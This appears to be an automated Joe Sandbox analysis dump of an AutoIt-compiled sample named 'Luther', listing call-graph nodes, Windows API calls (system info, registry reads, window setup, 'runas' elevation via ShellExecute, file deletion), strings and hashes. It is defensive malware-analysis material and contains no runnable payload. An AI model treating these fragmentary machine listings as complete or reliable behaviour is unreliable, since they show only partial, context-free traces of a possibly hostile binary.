e75353 104377->104381 104426 e33b39 104380->104426 104580 e9e30e 82 API calls 104381->104580 104384 e75361 104384->104376 104398 e31352 104397->104398 104402 e31371 __fread_nolock 104397->104402 104400 e5017b 8 API calls 104398->104400 104399 e5014b 8 API calls 104401 e31388 104399->104401 104400->104402 104401->104366 104402->104399 104403->104360 104583 e3663e LoadLibraryA 104404->104583 104409 e366a4 LoadLibraryExW 104591 e36607 LoadLibraryA 104409->104591 104410 e75648 104411 e366e7 68 API calls 104410->104411 104413 e7564f 104411->104413 104416 e36607 3 API calls 104413->104416 104418 e75657 104416->104418 104417 e366ce 104417->104418 104419 e366da 104417->104419 104612 e3684a 104418->104612 104420 e366e7 68 API calls 104419->104420 104422 e362fa 104420->104422 104422->104370 104422->104371 104427 e33b62 104426->104427 104428 e7415f 104426->104428 104430 e5017b 8 API calls 104427->104430 104865 e9a215 81 API calls __wsopen_s 104428->104865 104530 ea36d4 104529->104530 104531 e36874 64 API calls 104530->104531 104532 ea36e8 104531->104532 104883 ea3827 104532->104883 104580->104384 104584 e36656 GetProcAddress 104583->104584 104585 e36674 104583->104585 104586 e36666 104584->104586 104588 e5e95b 104585->104588 104586->104585 104587 e3666d FreeLibrary 104586->104587 104587->104585 104620 e5e89a 104588->104620 104590 e36698 104590->104409 104590->104410 104592 e3663b 104591->104592 104593 e3661c GetProcAddress 104591->104593 104596 e36720 104592->104596 104594 e3662c 104593->104594 104594->104592 104595 e36634 FreeLibrary 104594->104595 104595->104592 104597 e5017b 8 API calls 104596->104597 104598 e36735 104597->104598 104599 e3423c 8 API calls 104598->104599 104601 e36741 __fread_nolock 104599->104601 104600 e756c2 104686 ea3a92 74 API calls 104600->104686 104601->104600 104605 e3677c 104601->104605 104685 ea3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104601->104685 104604 e3684a 40 API calls 104604->104605 104605->104604 104607 e36810 messages 104605->104607 104608 e36874 64 API calls 104605->104608 104609 e75706 104605->104609 104607->104417 104608->104605 104680 e36874 104609->104680 104613 e3685c 104612->104613 104616 e75760 104612->104616 104718 e5ec34 104613->104718 104617 ea32bd 104820 ea310d 104617->104820 104621 e5e8a6 CallCatchBlock 104620->104621 104622 e5e8b4 104621->104622 104625 e5e8e4 104621->104625 104645 e5f649 20 API calls _abort 104622->104645 104624 e5e8b9 104646 e62b5c 26 API calls pre_c_initialization 104624->104646 104627 e5e8f6 104625->104627 104628 e5e8e9 104625->104628 104637 e683e1 104627->104637 104647 e5f649 20 API calls _abort 104628->104647 104631 e5e8ff 104632 e5e905 104631->104632 104633 e5e912 104631->104633 104648 e5f649 20 API calls _abort 104632->104648 104649 e5e944 LeaveCriticalSection __fread_nolock 104633->104649 104635 e5e8c4 __fread_nolock 104635->104590 104638 e683ed CallCatchBlock 104637->104638 104650 e632d1 EnterCriticalSection 104638->104650 104640 e683fb 104651 e6847b 104640->104651 104644 e6842c __fread_nolock 104644->104631 104645->104624 104646->104635 104647->104635 104648->104635 104649->104635 104650->104640 104659 e6849e 104651->104659 104652 e684f7 104670 e64ff0 20 API calls 2 library calls 104652->104670 104654 e68500 104671 e62d38 104654->104671 104657 e68509 104660 e68408 104657->104660 104677 e63778 11 API calls 2 library calls 104657->104677 104659->104652 104659->104660 104668 e594fd EnterCriticalSection 104659->104668 104669 e59511 LeaveCriticalSection 104659->104669 104665 e68437 104660->104665 104661 e68528 104678 e594fd EnterCriticalSection 104661->104678 104664 e6853b 104664->104660 104679 e63319 LeaveCriticalSection 104665->104679 104667 e6843e 104667->104644 104668->104659 104669->104659 104670->104654 104672 e62d43 RtlFreeHeap 104671->104672 104676 e62d6c _free 104671->104676 104673 e62d58 104672->104673 104672->104676 104674 e5f649 _free 18 API calls 104673->104674 104675 e62d5e GetLastError 104674->104675 104675->104676 104676->104657 104677->104661 104678->104664 104679->104667 104681 e36883 104680->104681 104684 e75780 104680->104684 104687 e5f053 104681->104687 104685->104600 104686->104605 104690 e5ee1a 104687->104690 104692 e5ee26 CallCatchBlock 104690->104692 104691 e5ee32 104715 e5f649 20 API calls _abort 104691->104715 104692->104691 104693 e5ee58 104692->104693 104703 e594fd EnterCriticalSection 104693->104703 104696 e5ee37 104716 e62b5c 26 API calls pre_c_initialization 104696->104716 104697 e5ee64 104704 e5ef7a 104697->104704 104702 e5ee42 __fread_nolock 104703->104697 104705 e5ef9c 104704->104705 104706 e5ef8c 104704->104706 104708 e5eea1 28 API calls 104705->104708 104707 e5f649 _free 20 API calls 104706->104707 104715->104696 104716->104702 104721 e5ec51 104718->104721 104720 e3686d 104720->104617 104722 e5ec5d CallCatchBlock 104721->104722 104723 e5ec70 ___scrt_fastfail 104722->104723 104724 e5ec9d 104722->104724 104725 e5ec95 __fread_nolock 104722->104725 104748 e5f649 20 API calls _abort 104723->104748 104734 e594fd EnterCriticalSection 104724->104734 104725->104720 104728 e5eca7 104735 e5ea68 104728->104735 104729 e5ec8a 104749 e62b5c 26 API calls pre_c_initialization 104729->104749 104734->104728 104736 e5ea97 104735->104736 104738 e5ea7a ___scrt_fastfail 104735->104738 104750 e5ecdc LeaveCriticalSection __fread_nolock 104736->104750 104737 e5ea87 104816 e5f649 20 API calls _abort 104737->104816 104738->104736 104738->104737 104741 e5eada __fread_nolock 104738->104741 104741->104736 104743 e5dcc5 __fread_nolock 26 API calls 104741->104743 104746 e5ebf6 ___scrt_fastfail 104741->104746 104751 e690c5 104741->104751 104818 e5d2e8 26 API calls 4 library calls 104741->104818 104743->104741 104745 e5ea8c 104817 e62b5c 26 API calls pre_c_initialization 104745->104817 104819 e5f649 20 API calls _abort 104746->104819 104748->104729 104749->104725 104750->104725 104752 e690d7 104751->104752 104753 e690ef 104751->104753 104754 e5f636 __dosmaperr 20 API calls 104752->104754 104755 e69459 104753->104755 104760 e69134 104753->104760 104756 e690dc 104754->104756 104757 e5f636 __dosmaperr 20 API calls 104755->104757 104762 e6913f 104760->104762 104763 e690e4 104760->104763 104767 e6916f 104760->104767 104763->104741 104816->104745 104817->104736 104818->104741 104819->104745 104823 e5e858 104820->104823 104822 ea311c 104826 e5e7d9 104823->104826 104825 e5e875 104825->104822 104827 e5e7fc 104826->104827 104828 e5e7e8 104826->104828 104832 e5e7f8 __alldvrm 104827->104832 104836 e636b2 11 API calls 2 library calls 104827->104836 104834 e5f649 20 API calls _abort 104828->104834 104831 e5e7ed 104835 e62b5c 26 API calls pre_c_initialization 104831->104835 104832->104825 104834->104831 104835->104832 104836->104832 104985->104312 104986 e31033 104991 e368b4 104986->104991 104990 e31042 104992 e3bf73 8 API calls 104991->104992 104993 e36922 104992->104993 104999 e3589f 104993->104999 104995 e369bf 104996 e31038 104995->104996 105002 e36b14 8 API calls __fread_nolock 104995->105002 104998 e50413 29 API calls __onexit 104996->104998 104998->104990 105003 e358cb 104999->105003 105002->104995 105004 e358be 105003->105004 105005 e358d8 105003->105005 105004->104995 105005->105004 105006 e358df RegOpenKeyExW 105005->105006 105006->105004 105007 e358f9 RegQueryValueExW 105006->105007 105008 e3592f RegCloseKey 105007->105008 105009 e3591a 105007->105009 105008->105004 105009->105008 105010 e336f5 105013 e3370f 105010->105013 105014 e33726 105013->105014 105015 e3372b 105014->105015 105016 e3378a 105014->105016 105052 e33788 105014->105052 105017 e33804 PostQuitMessage 105015->105017 105018 e33738 105015->105018 105020 e73df4 105016->105020 105021 e33790 105016->105021 105044 e33709 105017->105044 105022 e33743 105018->105022 105023 e73e61 105018->105023 105019 e3376f DefWindowProcW 105019->105044 105068 e32f92 10 API calls 105020->105068 105025 e33797 105021->105025 105026 e337bc SetTimer RegisterWindowMessageW 105021->105026 105027 e3380e 105022->105027 105028 e3374d 105022->105028 105071 e9c8f7 65 API calls ___scrt_fastfail 105023->105071 105032 e73d95 105025->105032 105033 e337a0 KillTimer 105025->105033 105029 e337e5 CreatePopupMenu 105026->105029 105026->105044 105058 e4fcad 105027->105058 105034 e33758 105028->105034 105040 e73e46 105028->105040 105029->105044 105031 e73e15 105069 e4f23c 40 API calls 105031->105069 105037 e73dd0 MoveWindow 105032->105037 105038 e73d9a 105032->105038 105039 e33907 Shell_NotifyIconW 105033->105039 105041 e33763 105034->105041 105042 e337f2 105034->105042 105037->105044 105045 e73da0 105038->105045 105046 e73dbf SetFocus 105038->105046 105047 e337b3 105039->105047 105040->105019 105070 e91423 8 API calls 105040->105070 105041->105019 105055 e33907 Shell_NotifyIconW 105041->105055 105066 e3381f 75 API calls ___scrt_fastfail 105042->105066 105043 e73e73 105043->105019 105043->105044 105045->105041 105051 e73da9 105045->105051 105046->105044 105065 e359ff DeleteObject DestroyWindow 105047->105065 105067 e32f92 10 API calls 105051->105067 105052->105019 105053 e33802 105053->105044 105056 e73e3a 105055->105056 105057 e3396b 60 API calls 105056->105057 105057->105052 105059 e4fcc5 ___scrt_fastfail 105058->105059 105060 e4fd4b 105058->105060 105061 e361a9 55 API calls 105059->105061 105060->105044 105062 e4fcec 105061->105062 105063 e4fd34 KillTimer SetTimer 105062->105063 105064 e8fe2b Shell_NotifyIconW 105062->105064 105063->105060 105064->105063 105065->105044 105066->105053 105067->105044 105068->105031 105069->105041 105070->105052 105071->105043 105072 e3105b 105077 e352a7 105072->105077 105074 e3106a 105108 e50413 29 API calls __onexit 105074->105108 105076 e31074 105078 e352b7 __wsopen_s 105077->105078 105079 e3bf73 8 API calls 105078->105079 105080 e3536d 105079->105080 105081 e35594 10 API calls 105080->105081 105082 e35376 105081->105082 105109 e35238 105082->105109 105085 e36b7c 8 API calls 105086 e3538f 105085->105086 105087 e36a7c 8 API calls 105086->105087 105088 e3539e 105087->105088 105089 e3bf73 8 API calls 105088->105089 105090 e353a7 105089->105090 105091 e3bd57 8 API calls 105090->105091 105092 e353b0 RegOpenKeyExW 105091->105092 105093 e74be6 RegQueryValueExW 105092->105093 105098 e353d2 105092->105098 105094 e74c03 105093->105094 105095 e74c7c RegCloseKey 105093->105095 105096 e5017b 8 API calls 105094->105096 105095->105098 105107 e74c8e _wcslen 105095->105107 105097 e74c1c 105096->105097 105099 e3423c 8 API calls 105097->105099 105098->105074 105100 e74c27 RegQueryValueExW 105099->105100 105101 e74c44 105100->105101 105104 e74c5e messages 105100->105104 105102 e38577 8 API calls 105101->105102 105102->105104 105103 e3655e 8 API calls 105103->105107 105104->105095 105105 e3b329 8 API calls 105105->105107 105106 e36a7c 8 API calls 105106->105107 105107->105098 105107->105103 105107->105105 105107->105106 105108->105076 105110 e722d0 __wsopen_s 105109->105110 105111 e35245 GetFullPathNameW 105110->105111 105112 e35267 105111->105112 105113 e38577 8 API calls 105112->105113 105114 e35285 105113->105114 105114->105085 105115 e85650 105124 e4e3d5 105115->105124 105117 e85666 105119 e856e1 105117->105119 105133 e4aa65 9 API calls 105117->105133 105122 e861d7 105119->105122 105135 ea3fe1 81 API calls __wsopen_s 105119->105135 105121 e856c1 105121->105119 105134 ea247e 8 API calls 105121->105134 105125 e4e3f6 105124->105125 105126 e4e3e3 105124->105126 105128 e4e429 105125->105128 105129 e4e3fb 105125->105129 105127 e3b4c8 8 API calls 105126->105127 105132 e4e3ed 105127->105132 105131 e3b4c8 8 API calls 105128->105131 105130 e5014b 8 API calls 105129->105130 105130->105132 105131->105132 105132->105117 105133->105121 105134->105119 105135->105122 105136 e4235c 105137 e42365 __fread_nolock 105136->105137 105138 e38ec0 52 API calls 105137->105138 105139 e874e3 105137->105139 105142 e423b6 105137->105142 105144 e5014b 8 API calls 105137->105144 105146 e41ff7 __fread_nolock 105137->105146 105147 e5017b 8 API calls 105137->105147 105138->105137 105148 e913c8 8 API calls __fread_nolock 105139->105148 105141 e874ef 105145 e3bed9 8 API calls 105141->105145 105141->105146 105143 e37d74 8 API calls 105142->105143 105143->105146 105144->105137 105145->105146 105147->105137 105148->105141 105149 e40ebf 105150 e40ed3 105149->105150 105155 e41425 105149->105155 105151 e40ee5 105150->105151 105152 e5014b 8 API calls 105150->105152 105153 e8562c 105151->105153 105154 e3b4c8 8 API calls 105151->105154 105156 e40f3e 105151->105156 105152->105151 105183 ea1b14 8 API calls 105153->105183 105154->105151 105155->105151 105159 e3bed9 8 API calls 105155->105159 105157 e42b20 207 API calls 105156->105157 105162 e4049d messages 105156->105162 105180 e40376 messages 105157->105180 105159->105151 105160 e5014b 8 API calls 105160->105180 105161 e8632b 105187 ea3fe1 81 API calls __wsopen_s 105161->105187 105163 e41e50 40 API calls 105163->105180 105164 e41695 105164->105162 105168 e3bed9 8 API calls 105164->105168 105166 e8625a 105186 ea3fe1 81 API calls __wsopen_s 105166->105186 105167 e85cdb 105167->105162 105172 e3bed9 8 API calls 105167->105172 105168->105162 105172->105162 105173 e3bed9 8 API calls 105173->105180 105174 e505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105174->105180 105175 e3bf73 8 API calls 105175->105180 105176 e50413 29 API calls pre_c_initialization 105176->105180 105177 e86115 105184 ea3fe1 81 API calls __wsopen_s 105177->105184 105179 e40aae messages 105185 ea3fe1 81 API calls __wsopen_s 105179->105185 105180->105160 105180->105161 105180->105162 105180->105163 105180->105164 105180->105166 105180->105167 105180->105173 105180->105174 105180->105175 105180->105176 105180->105177 105180->105179 105181 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105180->105181 105182 e41990 207 API calls 2 library calls 105180->105182 105181->105180 105182->105180 105183->105162 105184->105179 105185->105162 105186->105162 105187->105162 105188 e31098 105193 e35fc8 105188->105193 105192 e310a7 105194 e3bf73 8 API calls 105193->105194 105195 e35fdf GetVersionExW 105194->105195 105196 e38577 8 API calls 105195->105196 105197 e3602c 105196->105197 105198 e3adf4 8 API calls 105197->105198 105200 e36062 105197->105200 105199 e36056 105198->105199 105202 e355dc 8 API calls 105199->105202 105201 e3611c GetCurrentProcess IsWow64Process 105200->105201 105206 e75224 105200->105206 105203 e36138 105201->105203 105202->105200 105204 e36150 LoadLibraryA 105203->105204 105205 e75269 GetSystemInfo 105203->105205 105207 e36161 GetProcAddress 105204->105207 105208 e3619d GetSystemInfo 105204->105208 105207->105208 105210 e36171 GetNativeSystemInfo 105207->105210 105209 e36177 105208->105209 105211 e3109d 105209->105211 105212 e3617b FreeLibrary 105209->105212 105210->105209 105213 e50413 29 API calls __onexit 105211->105213 105212->105211 105213->105192 105214 e6947a 105215 e69487 105214->105215 105219 e6949f 105214->105219 105264 e5f649 20 API calls _abort 105215->105264 105217 e6948c 105265 e62b5c 26 API calls pre_c_initialization 105217->105265 105220 e694fa 105219->105220 105226 e69497 105219->105226 105266 e70144 21 API calls 2 library calls 105219->105266 105222 e5dcc5 __fread_nolock 26 API calls 105220->105222 105223 e69512 105222->105223 105234 e68fb2 105223->105234 105225 e69519 105225->105226 105227 e5dcc5 __fread_nolock 26 API calls 105225->105227 105228 e69545 105227->105228 105228->105226 105229 e5dcc5 __fread_nolock 26 API calls 105228->105229 105230 e69553 105229->105230 105230->105226 105231 e5dcc5 __fread_nolock 26 API calls 105230->105231 105232 e69563 105231->105232 105233 e5dcc5 __fread_nolock 26 API calls 105232->105233 105233->105226 105235 e68fbe CallCatchBlock 105234->105235 105236 e68fc6 105235->105236 105237 e68fde 105235->105237 105268 e5f636 20 API calls _abort 105236->105268 105239 e690a4 105237->105239 105243 e69017 105237->105243 105275 e5f636 20 API calls _abort 105239->105275 105240 e68fcb 105269 e5f649 20 API calls _abort 105240->105269 105245 e69026 105243->105245 105246 e6903b 105243->105246 105244 e690a9 105276 e5f649 20 API calls _abort 105244->105276 105270 e5f636 20 API calls _abort 105245->105270 105267 e654ba EnterCriticalSection 105246->105267 105248 e69033 105277 e62b5c 26 API calls pre_c_initialization 105248->105277 105251 e69041 105253 e69072 105251->105253 105254 e6905d 105251->105254 105252 e6902b 105271 e5f649 20 API calls _abort 105252->105271 105259 e690c5 __fread_nolock 38 API calls 105253->105259 105272 e5f649 20 API calls _abort 105254->105272 105256 e68fd3 __fread_nolock 105256->105225 105261 e6906d 105259->105261 105260 e69062 105273 e5f636 20 API calls _abort 105260->105273 105274 e6909c LeaveCriticalSection __wsopen_s 105261->105274 105264->105217 105265->105226 105266->105220 105267->105251 105268->105240 105269->105256 105270->105252 105271->105248 105272->105260 105273->105261 105274->105256 105275->105244 105276->105248 105277->105256 105278 e3dd3d 105279 e3dd63 105278->105279 105281 e819c2 105278->105281 105280 e3dead 105279->105280 105283 e5014b 8 API calls 105279->105283 105287 e5017b 8 API calls 105280->105287 105282 e81a82 105281->105282 105286 e81a26 105281->105286 105291 e81a46 105281->105291 105323 ea3fe1 81 API calls __wsopen_s 105282->105323 105290 e3dd8d 105283->105290 105321 e4e6e8 207 API calls 105286->105321 105297 e3dee4 __fread_nolock 105287->105297 105288 e81a7d 105292 e5014b 8 API calls 105290->105292 105290->105297 105291->105288 105322 ea3fe1 81 API calls __wsopen_s 105291->105322 105294 e3dddb 105292->105294 105293 e5017b 8 API calls 105293->105297 105294->105286 105295 e3de16 105294->105295 105296 e40340 207 API calls 105295->105296 105298 e3de29 105296->105298 105297->105291 105297->105293 105298->105288 105298->105297 105299 e81aa5 105298->105299 105300 e3de77 105298->105300 105302 e3d526 105298->105302 105324 ea3fe1 81 API calls __wsopen_s 105299->105324 105300->105280 105300->105302 105303 e5014b 8 API calls 105302->105303 105304 e3d589 105303->105304 105305 e3c32d 8 API calls 105304->105305 105306 e3d5b3 105305->105306 105307 e5014b 8 API calls 105306->105307 105312 e3d66e messages 105307->105312 105308 e3c3ab 8 API calls 105318 e3d9ac messages 105308->105318 105309 e3b4c8 8 API calls 105309->105312 105311 e81f79 105325 e956ae 8 API calls messages 105311->105325 105312->105309 105312->105311 105314 e81f94 105312->105314 105315 e3bed9 8 API calls 105312->105315 105316 e3c3ab 8 API calls 105312->105316 105317 e3d911 messages 105312->105317 105315->105312 105316->105312 105317->105308 105317->105318 105319 e3d9c3 105318->105319 105320 e4e30a 8 API calls messages 105318->105320 105320->105318 105321->105291 105322->105288 105323->105288 105324->105288 105325->105314 105326 e3f4dc 105327 e3cab0 207 API calls 105326->105327 105328 e3f4ea 105327->105328

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 461 e35fc8-e36037 call e3bf73 GetVersionExW call e38577 466 e7507d-e75090 461->466 467 e3603d 461->467 468 e75091-e75095 466->468 469 e3603f-e36041 467->469 470 e75097 468->470 471 e75098-e750a4 468->471 472 e36047-e360a6 call e3adf4 call e355dc 469->472 473 e750bc 469->473 470->471 471->468 474 e750a6-e750a8 471->474 485 e75224-e7522b 472->485 486 e360ac-e360ae 472->486 477 e750c3-e750cf 473->477 474->469 476 e750ae-e750b5 474->476 476->466 479 e750b7 476->479 480 e3611c-e36136 GetCurrentProcess IsWow64Process 477->480 479->473 483 e36195-e3619b 480->483 484 e36138 480->484 487 e3613e-e3614a 483->487 484->487 490 e7522d 485->490 491 e7524b-e7524e 485->491 488 e75125-e75138 486->488 489 e360b4-e360b7 486->489 492 e36150-e3615f LoadLibraryA 487->492 493 e75269-e7526d GetSystemInfo 487->493 494 e75161-e75163 488->494 495 e7513a-e75143 488->495 489->480 496 e360b9-e360f5 489->496 497 e75233 490->497 498 e75250-e7525f 491->498 499 e75239-e75241 491->499 500 e36161-e3616f GetProcAddress 492->500 501 e3619d-e361a7 GetSystemInfo 492->501 506 e75165-e7517a 494->506 507 e75198-e7519b 494->507 503 e75145-e7514b 495->503 504 e75150-e7515c 495->504 496->480 505 e360f7-e360fa 496->505 497->499 498->497 508 e75261-e75267 498->508 499->491 500->501 509 e36171-e36175 GetNativeSystemInfo 500->509 502 e36177-e36179 501->502 516 e36182-e36194 502->516 517 e3617b-e3617c FreeLibrary 502->517 503->480 504->480 510 e750d4-e750e4 505->510 511 e36100-e3610a 505->511 512 e75187-e75193 506->512 513 e7517c-e75182 506->513 514 e751d6-e751d9 507->514 515 e7519d-e751b8 507->515 508->499 509->502 521 e750f7-e75101 510->521 522 e750e6-e750f2 510->522 511->477 518 e36110-e36116 511->518 512->480 513->480 514->480 523 e751df-e75206 514->523 519 e751c5-e751d1 515->519 520 e751ba-e751c0 515->520 517->516 518->480 519->480 520->480 524 e75114-e75120 521->524 525 e75103-e7510f 521->525 522->480 526 e75213-e7521f 523->526 527 e75208-e7520e 523->527 524->480 525->480 526->480 527->480
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00E35FF7
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          • GetCurrentProcess.KERNEL32(?,00ECDC2C,00000000,?,?), ref: 00E36123
                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E3612A
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E36155
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E36167
                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E36175
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E3617C
                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00E361A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                          • Opcode ID: f4311353e5dc4f0344190cb072308751457425fc42f2b5f27b655927212c7bfe
                                                                                                          • Instruction ID: 7310752dfa1fa83c00465ad4b8a16bd3b5b09d3a8f8ba0e42fe1aff0f74b91ec
                                                                                                          • Opcode Fuzzy Hash: f4311353e5dc4f0344190cb072308751457425fc42f2b5f27b655927212c7bfe
                                                                                                          • Instruction Fuzzy Hash: 24A1B82280A7CCDFC756C7BC7C4D5D57FA47B26304F58A899D484B7222C66D4948EB31

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E33368,?), ref: 00E333BB
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E33368,?), ref: 00E333CE
                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F02418,00F02400,?,?,?,?,?,?,00E33368,?), ref: 00E3343A
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                            • Part of subcall function 00E3425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E33462,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E342A0
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E334BB
                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E73CB0
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E73CF1
                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EF31F4,00F02418,?,?,?,?,?,?,?,00E33368), ref: 00E73D7A
                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E73D81
                                                                                                            • Part of subcall function 00E334D3: GetSysColorBrush.USER32(0000000F), ref: 00E334DE
                                                                                                            • Part of subcall function 00E334D3: LoadCursorW.USER32(00000000,00007F00), ref: 00E334ED
                                                                                                            • Part of subcall function 00E334D3: LoadIconW.USER32(00000063), ref: 00E33503
                                                                                                            • Part of subcall function 00E334D3: LoadIconW.USER32(000000A4), ref: 00E33515
                                                                                                            • Part of subcall function 00E334D3: LoadIconW.USER32(000000A2), ref: 00E33527
                                                                                                            • Part of subcall function 00E334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E3353F
                                                                                                            • Part of subcall function 00E334D3: RegisterClassExW.USER32(?), ref: 00E33590
                                                                                                            • Part of subcall function 00E335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E335E1
                                                                                                            • Part of subcall function 00E335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E33602
                                                                                                            • Part of subcall function 00E335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E33616
                                                                                                            • Part of subcall function 00E335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E3361F
                                                                                                            • Part of subcall function 00E3396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33A3C
                                                                                                          Strings
                                                                                                          • runas, xrefs: 00E73D75
                                                                                                          • AutoIt, xrefs: 00E73CA5
                                                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E73CAA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                          • API String ID: 683915450-2030392706
                                                                                                          • Opcode ID: 82776e88fcc448d8984c167d580c1cc3f84d6ec6ab25f07062e360a1e4a19cdd
                                                                                                          • Instruction ID: 7c8e790d9791a825845fdcc1567af540b2c92ed85f0829401bf3f84ad1561501
                                                                                                          • Opcode Fuzzy Hash: 82776e88fcc448d8984c167d580c1cc3f84d6ec6ab25f07062e360a1e4a19cdd
                                                                                                          • Instruction Fuzzy Hash: B451F770208345AEC711EF709C4DDAEBFE8AF84744F00242DF591761A3DB328A49E722

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871
                                                                                                            • Part of subcall function 00E9EAB0: GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E9DCCB
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9DD1B
                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E9DD2C
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00E9DD43
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00E9DD4C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                          • Opcode ID: 897b503413c8d01dbe75e299192a2f16fd0fade15753c58301aed723dff5fc08
                                                                                                          • Instruction ID: c93b8cee3edd4d6ac811551794562be5e95e22a9034360673ecdd2436f23bfb2
